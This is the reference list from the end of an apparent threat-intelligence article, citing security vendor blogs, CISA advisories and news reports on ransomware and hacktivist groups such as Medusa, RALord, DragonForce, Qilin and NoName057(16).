  6. Weekly Intelligence Report – 11 Apr 2025 – CYFIRMA, accessed April 17, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-11-apr-2025/
  7. What is SafePay Ransomware? – Everything You Need to Know …, accessed April 17, 2025, https://redpiranha.net/news/what-is-safepay-ransomware-everything-you-need-know
  8. Exclusive: SafePay claims breach of Aussie fire protection services firm – Cyber Daily, accessed April 17, 2025, https://www.cyberdaily.au/security/12003-exclusive-safepay-claims-breach-of-aus-fire-protection-services-firm
  9. Space Bears Ransomware Recovery | Solace Cyber, accessed April 17, 2025, https://solacecyber.co.uk/space-bears-ransomware/
  10. #StopRansomware: Medusa Ransomware | CISA, accessed April 17, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
  11. ARaaStocracy – RALord ransomware emerges with new DLS – CYJAX, accessed April 17, 2025, https://www.cyjax.com/resources/blog/araastocracy-ralord-ransomware-emerges-with-new-dls/
  12. DragonForce Ransomware Group is Targeting Saudi … – Resecurity, accessed April 17, 2025, https://www.resecurity.com/blog/article/dragonforce-ransomware-group-is-targeting-saudi-arabia
  13. #StopRansomware: Medusa Ransomware – Internet Crime Complaint Center, accessed April 17, 2025, https://www.ic3.gov/CSA/2025/250312.pdf
  14. RALord Ransomware | WatchGuard Technologies, accessed April 17, 2025, https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/ralord
  15. The Growing Threat Posed by Hacktivist Groups – Searchlight Cyber, accessed April 17, 2025, https://slcyber.io/blog/the-growing-threat-posed-by-hacktivist-groups/
  16. Israel ranks second in list of countries targeted by cyberattacks in 2024 — report, accessed April 17, 2025, https://www.timesofisrael.com/israel-ranks-second-in-list-of-countries-targeted-by-cyberattacks-in-2024-report/
  17. Three Months After the Storm: Did Cybercriminals Move to Telegram …, accessed April 17, 2025, https://www.kelacyber.com/blog/three-months-after-the-storm-did-cybercriminals-move-to-telegram-alternatives/
  18. Holy League: A Unified Threat Against Western Nations, NATO, India and Israel – Radware, accessed April 17, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/holy-league-a-unified-threat-against-western-nations/
  19. Cyber Intelligence Bureau Orange Cyberdefense, accessed April 17, 2025, https://www.orangecyberdefense.com/fileadmin/global/CyberIntelligenceBureau/Gangs_Investigations/Sector16/Sector16Group.pdf
  20. The Exodus Began: Alternatives for Telegram – SOCRadar® Cyber Intelligence Inc., accessed April 17, 2025, https://socradar.io/the-exodus-began-alternatives-for-telegram/
  21. Peoples Cyber Army Of Russia | Threat Actor Profile – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/peoples-cyber-army-of-russia/
  22. NoName057(16): Pro-Russian Hacktivist Group – Radware, accessed April 17, 2025, https://www.radware.com/cyberpedia/ddos-attacks/noname057(16)/
  23. New Hacktivist Alliance Emerges: OverFlame and SECTOR16 Join Forces – Cyber Press, accessed April 17, 2025, https://cyberpress.org/overflame-sector16-join/
  24. Agenda (Qilin) – SentinelOne, accessed April 17, 2025, https://www.sentinelone.com/anthology/agenda-qilin/
  25. Qilin Ransomware: Exposing the TTPs Behind One of the Most Active Ransomware Campaigns of 2024 – Picus Security, accessed April 17, 2025, https://www.picussecurity.com/resource/blog/qilin-ransomware
  26. Space Bears Ransomware: What You Need To Know – Tripwire, accessed April 17, 2025, https://www.tripwire.com/state-of-security/space-bears-ransomware-what-you-need-know
  27. Atos Group Denies Space Bears’ Ransomware Attack Claims – Infosecurity Magazine, accessed April 17, 2025, https://www.infosecurity-magazine.com/news/atos-denies-space-bears-ransomware/
  28. DragonForce Ransomware Group: Tactics, Targets & Mitigation – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/dragonforce-ransomware-group/
  29. DragonForce Ransomware Hits Saudi Firm, 6TB Data Stolen – Infosecurity Magazine, accessed April 17, 2025, https://www.infosecurity-magazine.com/news/6tb-data-stolen-saudi-cyber-attack/
  30. Medusa Ransomware Analysis, Simulation, and Mitigation – CISA Alert AA25-071A, accessed April 17, 2025, https://www.picussecurity.com/resource/blog/medusa-ransomware-cisa-alert-aa25-071a
  31. RALord Ransomware, accessed April 17, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/ralord-ransomware
  32. Threat Actors Merging Malicious Activity With Cryptocurrency Show How the Attack Landscape is Developing in Decentralized Finance – EclecticIQ Blog, accessed April 17, 2025, https://blog.eclecticiq.com/threat-actors-merging-malicious-activity-with-cryptocurrency-show-how-the-attack-landscape-is-developing-in-decentralized-finance
  33. What Is A Zero Day Exploit? 0day Attack – Cyble, accessed April 17, 2025, https://cyble.com/knowledge-hub/zero-day-exploit/
  34. Dark Storm Team: The Hacker Group Behind the DDoS Attack on X …, accessed April 17, 2025, https://foresiet.com/blog/dark-storm-team-the-hacker-group-behind-the-ddos-attack-on-x-twitter
  35. Global Hacktivist Threats – Graphika, accessed April 17, 2025, https://graphika.com/reports/global-hacktivist-threats

Related Posts